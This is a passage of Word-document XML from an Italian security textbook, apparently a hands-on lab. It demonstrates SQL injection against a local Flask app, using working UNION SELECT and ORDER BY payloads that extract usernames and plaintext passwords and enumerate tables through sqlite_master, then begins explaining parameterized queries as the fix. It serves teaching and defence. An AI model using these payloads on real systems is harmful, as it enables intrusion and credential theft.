        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[DEBUG] Query eseguita: SELECT nome, descrizione FROM prodotti WHERE nome LIKE '%conto%'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bene. La query restituisce due colonne:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">descrizione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="217"/>
    <w:bookmarkStart w:id="218" w:name="passo-1-confermare-la-vulnerabilità"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Passo 1: confermare la vulnerabilità</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modifica l’URL nel browser (oppure direttamente nella casella di ricerca) inserendo un singolo apice:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa appare? Un errore SQL del tipo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Errore nel database:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unrecognized token: "'%'"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(o simile, in inglese).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Bingo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L’errore conferma che il nostro apice è uscito dal contesto stringa ed è stato interpretato come parte della query SQL. Significa che possiamo iniettare codice. Non è ancora utile in sé, ma è la conferma che il bersaglio è vulnerabile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">In produzione, gli errori SQL non dovrebbero mai essere mostrati all’utente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Restituire stack trace o messaggi del database al pubblico è una vulnerabilità a sé stante (rientra in OWASP A02 Security Misconfiguration). Per il lab li abbiamo lasciati apposta, perché aiutano a capire cosa succede. Vedremo nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> come configurare la modalità di produzione.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="218"/>
    <w:bookmarkStart w:id="219" w:name="passo-2-scoprire-il-numero-di-colonne"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Passo 2: scoprire il numero di colonne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per usare un attacco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, serve sapere quante colonne restituisce la query originale. Se non corrispondono, il database darà errore di sintassi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tecnica classica: usiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dove</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un numero. Se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è ≤ al numero di colonne, la query funziona. Se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è maggiore, il database dà errore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai su:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 1 --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(spazi inclusi, l’URL encoding lo fa il browser). Nessun errore, nessun risultato. Bene.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 2 --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sempre OK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 3 --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Errore!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Qualcosa tipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Errore nel database: 1st ORDER BY term out of range</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vuol dire che la terza colonna non esiste.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">La query restituisce 2 colonne.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="219"/>
    <w:bookmarkStart w:id="220" w:name="X24fb4d73be312484447551f0dce79018b211b92"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Passo 3: lanciare UNION SELECT per estrarre dati</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un’istruzione SQL che permette di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">unire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i risultati di due query diverse, purché abbiano lo stesso numero di colonne. È legittima e usatissima nei database normali. Ma diventa un’arma potentissima nelle mani di un attaccante: gli permette di concatenare alla query originale (che restituisce prodotti)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">una seconda query a sua scelta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(che restituisce, per esempio, gli utenti).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai su:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT username, password FROM utenti --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il browser ti mostra una tabella con tutti gli utenti del database e le loro password in chiaro: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Nome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descrizione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sup3rS3gret0!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">mario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">mario123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">giulia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">giulia2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">luca</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">passwordLuca!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la pagina dei risultati di ricerca che ha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">estratto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come prodotti i nomi utente e password dalla tabella utenti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3401568"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_14_la_pagina_dei_risultati_di_ricerca_che_ha_estratto_come_prod.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3401568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">In dieci secondi hai esfiltrato l’intero database delle credenziali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, semplicemente cambiando un parametro nell’URL. Niente forza bruta, niente exploit complicato. Solo il fatto che la query era costruita concatenando l’input.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="220"/>
    <w:bookmarkStart w:id="221" w:name="cosa-è-successo-riga-per-riga-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa è successo, riga per riga</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Guarda il terminale Flask:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[DEBUG] Query eseguita: SELECT nome, descrizione FROM prodotti WHERE nome LIKE '%' UNION SELECT username, password FROM utenti --%'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decostruzione:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT nome, descrizione FROM prodotti WHERE nome LIKE '%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— la query originale, che ora restituisce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tutti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i prodotti (perché</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE '%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">matcha tutto)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT username, password FROM utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— la query iniettata</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-- %'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">commenta tutto il resto, neutralizzando l’apice di chiusura che sarebbe rimasto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il database esegue le due SELECT separatamente, le unisce, e restituisce il risultato unito. La nostra applicazione lo mostra come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">risultati di ricerca prodotti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="221"/>
    <w:bookmarkStart w:id="222" w:name="X8bc283112f3b36fb094ed1aed1d0b553b94d4c1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Variante: scoprire la struttura del database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se non sapessi già che esiste una tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, potresti scoprirla interrogando la tabella di sistema di SQLite, chiamata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite_master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT name, sql FROM sqlite_master WHERE type='table' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedrai la lista di tutte le tabelle del database con le loro definizioni complete (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). In altri database (MySQL, PostgreSQL, SQL Server) esistono tabelle di sistema equivalenti (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Un attaccante alle prime armi non scopre tutto in un colpo: prima esplora la struttura, poi va a colpo sicuro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="222"/>
    <w:bookmarkEnd w:id="223"/>
    <w:bookmarkStart w:id="226" w:name="la-correzione-query-parametrizzate"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="502" w:name="sec_5_7"/>
      <w:r>
        <w:t xml:space="preserve">5.7 La correzione: query parametrizzate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="502"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso correggiamo l’app. La difesa principale contro la SQL Injection è una sola:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non concatenare mai input dell’utente nelle query, usare sempre query parametrizzate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="224" w:name="cosa-cambia-nel-codice"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa cambia nel codice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e modifica la funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">login()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Trova questa parte:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ VULNERABILE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"SELECT id, username, ruolo FROM utenti "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"WHERE username='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
